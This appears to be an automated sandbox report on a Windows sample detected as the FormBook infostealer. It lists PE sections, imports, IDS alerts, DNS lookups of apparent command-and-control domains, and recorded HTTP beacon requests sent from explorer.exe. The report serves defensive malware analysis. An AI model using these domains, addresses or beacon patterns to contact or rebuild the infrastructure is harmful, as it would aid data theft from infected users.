                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x5b680x5c00False0.67722486413data6.48746502716IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rdata0x70000x129c0x1400False0.4337890625data5.04904254867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x90000x25c580x400False0.58203125data4.76995537906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .rsrc0x370000x9000xa00False0.4078125data3.93441125971IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_ICON0x371900x2e8dataEnglishUnited States
                                    RT_DIALOG0x374780x100dataEnglishUnited States
                                    RT_DIALOG0x375780x11cdataEnglishUnited States
                                    RT_DIALOG0x376980x60dataEnglishUnited States
                                    RT_GROUP_ICON0x376f80x14dataEnglishUnited States
                                    RT_MANIFEST0x377100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                    Imports

                                    DLLImport
                                    KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                                    USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                    SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                    ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                    VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    12/02/21-20:00:36.476668TCP1201ATTACK-RESPONSES 403 Forbidden804977734.102.136.180192.168.2.3
                                    12/02/21-20:00:41.788599TCP1201ATTACK-RESPONSES 403 Forbidden804979334.102.136.180192.168.2.3

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 2, 2021 20:00:36.216691971 CET4977780192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:36.233905077 CET804977734.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:36.234029055 CET4977780192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:36.234204054 CET4977780192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:36.251166105 CET804977734.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:36.476667881 CET804977734.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:36.476706028 CET804977734.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:36.476895094 CET4977780192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:36.476938963 CET4977780192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:36.786031008 CET4977780192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:36.804990053 CET804977734.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:41.523844957 CET4979380192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:41.543034077 CET804979334.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:41.543169975 CET4979380192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:41.543401957 CET4979380192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:41.562285900 CET804979334.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:41.788599014 CET804979334.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:41.788650990 CET804979334.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:41.788954020 CET4979380192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:41.789102077 CET4979380192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:41.808116913 CET804979334.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:52.034548998 CET4980880192.168.2.323.110.214.34
                                    Dec 2, 2021 20:00:55.037508965 CET4980880192.168.2.323.110.214.34
                                    Dec 2, 2021 20:01:01.038088083 CET4980880192.168.2.323.110.214.34
                                    Dec 2, 2021 20:01:16.960594893 CET4980980192.168.2.323.110.214.34
                                    Dec 2, 2021 20:01:18.362354040 CET4981080192.168.2.345.8.125.8
                                    Dec 2, 2021 20:01:18.433792114 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.436881065 CET4981080192.168.2.345.8.125.8
                                    Dec 2, 2021 20:01:18.436930895 CET4981080192.168.2.345.8.125.8
                                    Dec 2, 2021 20:01:18.508413076 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.510102034 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.510129929 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.510266066 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.510354042 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.510484934 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.510514975 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.510546923 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.510771036 CET4981080192.168.2.345.8.125.8
                                    Dec 2, 2021 20:01:18.510786057 CET4981080192.168.2.345.8.125.8
                                    Dec 2, 2021 20:01:18.510788918 CET4981080192.168.2.345.8.125.8
                                    Dec 2, 2021 20:01:18.510791063 CET4981080192.168.2.345.8.125.8
                                    Dec 2, 2021 20:01:18.510792971 CET4981080192.168.2.345.8.125.8
                                    Dec 2, 2021 20:01:18.581895113 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:19.968739033 CET4980980192.168.2.323.110.214.34
                                    Dec 2, 2021 20:01:25.969937086 CET4980980192.168.2.323.110.214.34

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 2, 2021 20:00:36.186220884 CET4957253192.168.2.38.8.8.8
                                    Dec 2, 2021 20:00:36.210366011 CET53495728.8.8.8192.168.2.3
                                    Dec 2, 2021 20:00:41.495348930 CET6082353192.168.2.38.8.8.8
                                    Dec 2, 2021 20:00:41.519289017 CET53608238.8.8.8192.168.2.3
                                    Dec 2, 2021 20:00:46.807691097 CET5510253192.168.2.38.8.8.8
                                    Dec 2, 2021 20:00:46.831301928 CET53551028.8.8.8192.168.2.3
                                    Dec 2, 2021 20:00:51.858485937 CET5652753192.168.2.38.8.8.8
                                    Dec 2, 2021 20:00:52.032300949 CET53565278.8.8.8192.168.2.3
                                    Dec 2, 2021 20:01:16.770849943 CET4955953192.168.2.38.8.8.8
                                    Dec 2, 2021 20:01:16.942539930 CET53495598.8.8.8192.168.2.3
                                    Dec 2, 2021 20:01:18.165642023 CET5265053192.168.2.38.8.8.8
                                    Dec 2, 2021 20:01:18.359935045 CET53526508.8.8.8192.168.2.3
                                    Dec 2, 2021 20:01:23.519859076 CET5836153192.168.2.38.8.8.8
                                    Dec 2, 2021 20:01:23.555322886 CET53583618.8.8.8192.168.2.3

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Dec 2, 2021 20:00:36.186220884 CET192.168.2.38.8.8.80x10baStandard query (0)www.yr-golf.comA (IP address)IN (0x0001)
                                    Dec 2, 2021 20:00:41.495348930 CET192.168.2.38.8.8.80xc7e4Standard query (0)www.assisttm.comA (IP address)IN (0x0001)
                                    Dec 2, 2021 20:00:46.807691097 CET192.168.2.38.8.8.80x498eStandard query (0)www.gsjbd1.clubA (IP address)IN (0x0001)
                                    Dec 2, 2021 20:00:51.858485937 CET192.168.2.38.8.8.80x9dd7Standard query (0)www.tyjgfuke.comA (IP address)IN (0x0001)
                                    Dec 2, 2021 20:01:16.770849943 CET192.168.2.38.8.8.80x9969Standard query (0)www.tyjgfuke.comA (IP address)IN (0x0001)
                                    Dec 2, 2021 20:01:18.165642023 CET192.168.2.38.8.8.80x7c7dStandard query (0)www.fastbest.hostA (IP address)IN (0x0001)
                                    Dec 2, 2021 20:01:23.519859076 CET192.168.2.38.8.8.80xe521Standard query (0)www.caixadepandora.clubA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Dec 2, 2021 20:00:36.210366011 CET8.8.8.8192.168.2.30x10baNo error (0)www.yr-golf.comyr-golf.comCNAME (Canonical name)IN (0x0001)
                                    Dec 2, 2021 20:00:36.210366011 CET8.8.8.8192.168.2.30x10baNo error (0)yr-golf.com34.102.136.180A (IP address)IN (0x0001)
                                    Dec 2, 2021 20:00:41.519289017 CET8.8.8.8192.168.2.30xc7e4No error (0)www.assisttm.comassisttm.comCNAME (Canonical name)IN (0x0001)
                                    Dec 2, 2021 20:00:41.519289017 CET8.8.8.8192.168.2.30xc7e4No error (0)assisttm.com34.102.136.180A (IP address)IN (0x0001)
                                    Dec 2, 2021 20:00:46.831301928 CET8.8.8.8192.168.2.30x498eName error (3)www.gsjbd1.clubnonenoneA (IP address)IN (0x0001)
                                    Dec 2, 2021 20:00:52.032300949 CET8.8.8.8192.168.2.30x9dd7No error (0)www.tyjgfuke.com23.110.214.34A (IP address)IN (0x0001)
                                    Dec 2, 2021 20:01:16.942539930 CET8.8.8.8192.168.2.30x9969No error (0)www.tyjgfuke.com23.110.214.34A (IP address)IN (0x0001)
                                    Dec 2, 2021 20:01:18.359935045 CET8.8.8.8192.168.2.30x7c7dNo error (0)www.fastbest.host45.8.125.8A (IP address)IN (0x0001)
                                    Dec 2, 2021 20:01:23.555322886 CET8.8.8.8192.168.2.30xe521No error (0)www.caixadepandora.club137.184.111.224A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.yr-golf.com
                                    • www.assisttm.com
                                    • www.fastbest.host

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.34977734.102.136.18080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 2, 2021 20:00:36.234204054 CET8401OUTGET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB HTTP/1.1
                                    Host: www.yr-golf.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Dec 2, 2021 20:00:36.476667881 CET8403INHTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Thu, 02 Dec 2021 19:00:36 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "61973ffe-113"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.34979334.102.136.18080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 2, 2021 20:00:41.543401957 CET8436OUTGET /n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh HTTP/1.1
                                    Host: www.assisttm.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Dec 2, 2021 20:00:41.788599014 CET8437INHTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Thu, 02 Dec 2021 19:00:41 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "61a4f026-113"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.34981045.8.125.880C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 2, 2021 20:01:18.436930895 CET8482OUTGET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom HTTP/1.1
                                    Host: www.fastbest.host
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Dec 2, 2021 20:01:18.510102034 CET8483INHTTP/1.1 404 Not Found
                                    Server: nginx/1.20.1
                                    Date: Thu, 02 Dec 2021 19:01:18 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 7081
                                    Connection: close
                                    Last-Modified: Mon, 27 Sep 2021 00:52:07 GMT
                                    ETag: "1ba9-5ccef81a2c93b"
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 66 61 73 74 62 65 73 74 20 2d 20 d0 a5 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 d0 b4 d0 bb d1 8f 20 d0 ba d0 b0 d0 b6 d0 b4 d0 be d0 b3 d0 be 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 73 71 55 49 6d 44 43 56 4b 41 73 37 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 77 67 68 74 40 33 30 30 3b 34 30 30 3b 36 30 30 3b 37 30 30 3b 38 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4a 6f 73 65 66 69 6e 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 51 44 54 38 59 66 4e 30 42 46 63 4d 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 68 4b 66 71 4e 6a 77 58 50 53 7a 65 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 61 74 54 63 73 52 4a 4f 4c 6f 4d 6c 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 6f 68 4f 71 6c 77 38 70 6c 39 6e 68 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 4c 43 50 36 72 75 4c 70 4d 48 5a 58 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 4a 35 68 6c 79 71 37 76 34 4c 71 49 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 65 75 76 7a 64 30 52 4f 37 4d 6e 75 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 56 4b 65 49 68 34 52 47 67 34 30 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content> <title>fastbest - </title> <link rel="icon" type="image/png" href="sqUImDCVKAs7.ico"> <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600;700;800&amp;display=swap" rel="stylesheet"> <link rel="preconnect" href="https://fonts.gstatic.com"> <link href="https://fonts.googleapis.com/css2?family=Josefin+Sans:wght@400;500;600;700&amp;display=swap" rel="stylesheet"> <link rel="stylesheet" href="css/QDT8YfN0BFcM.css"> <link rel="stylesheet" href="css/hKfqNjwXPSze.css"> <link rel="stylesheet" href="css/atTcsRJOLoMl.css"> <link rel="stylesheet" href="css/ohOqlw8pl9nh.css"> <link rel="stylesheet" href="css/LCP6ruLpMHZX.css"> <link rel="stylesheet" href="css/J5hlyq7v4LqI.css"> <link rel="stylesheet" href="css/euvzd0RO7Mnu.css"> <link rel="stylesheet" href="css/rVKeIh4RGg40.css"> <link rel="stylesh
                                    Dec 2, 2021 20:01:18.510129929 CET8484INData Raw: 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 53 34 39 4d 7a 63 4e 69 4a 59 79 52 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 33 4e 30 42 67 32 34 75 51 30 46
                                    Data Ascii: eet" href="css/S49MzcNiJYyR.css"> <link rel="stylesheet" href="css/3N0Bg24uQ0Fg.css"> <link rel="stylesheet" href="css/jm4ECKSZcvmb.css"> <link rel="stylesheet" href="css/IdJlOhx5FaDM.css"></head><body> ...[if IE]> <p c
                                    Dec 2, 2021 20:01:18.510266066 CET8486INData Raw: 70 61 63 65 72 2d 32 30 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 61 73 74
                                    Data Ascii: pacer-20 --> <p> <a href="https://fastbest.host" class="rt-btn rt-gradient text-capitalize rt-rounded custom-font"></a> </p> </div>... /.col-12 -->
                                    Dec 2, 2021 20:01:18.510354042 CET8487INData Raw: 6c 61 73 73 3d 22 72 74 2d 6d 62 2d 33 30 22 3e 3c 73 74 72 6f 6e 67 3e 53 68 6f 70 70 69 6e 67 20 43 61 72 74 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 34 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 74 62 6f 78 2d 63 6c
                                    Data Ascii: lass="rt-mb-30"><strong>Shopping Cart</strong></h4> <div class="cartbox-close"> <i class="flaticon-cancel"></i> </div>... ./ sidenavclose --> <div class="cart-products rt-mt-30"> <div class="rt-
                                    Dec 2, 2021 20:01:18.510484934 CET8488INData Raw: 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 70 72 6f 64 75 63 74 2d 74 65 78 74 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 64 75 63 74 2d 63 6f 6c 6f 73 65 22 3e 0a 20 20 20 20 20 20 20
                                    Data Ascii: </div>... /.product-text --> <div class="product-colose"> <span class="rt-remove-product"><i class="flaticon-cancel"></i></span> </div>... /.product-colose --> </div>... /.rt-s
                                    Dec 2, 2021 20:01:18.510514975 CET8489INData Raw: 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 66 6c 6f 61 74 2d 72 69 67 68 74 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 6c 65 61 72 66 69 78 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76
                                    Data Ascii: /div>... /.float-right --> </div>... /.clearfix --> <div class="rt-mt-15"> <a href="#" class="rt-btn rt-gradient multipule-color-strep rt-sm text-uppercase d-block text-center rt-mb-10">View Cart</a>


                                    Code Manipulations

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    Analysis Process: Y1p8VPvyU2.exe PID: 7100 Parent PID: 1688

                                    General

                                    Start time:19:59:12
                                    Start date:02/12/2021
                                    Path:C:\Users\user\Desktop\Y1p8VPvyU2.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Y1p8VPvyU2.exe"
                                    Imagebase:0x400000
                                    File size:318467 bytes
                                    MD5 hash:83BE105C9FA2427BD6079F5D19659596
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: Y1p8VPvyU2.exe PID: 1304 Parent PID: 7100

                                    General

                                    Start time:19:59:14
                                    Start date:02/12/2021
                                    Path:C:\Users\user\Desktop\Y1p8VPvyU2.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Y1p8VPvyU2.exe"
                                    Imagebase:0x400000
                                    File size:318467 bytes
                                    MD5 hash:83BE105C9FA2427BD6079F5D19659596
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
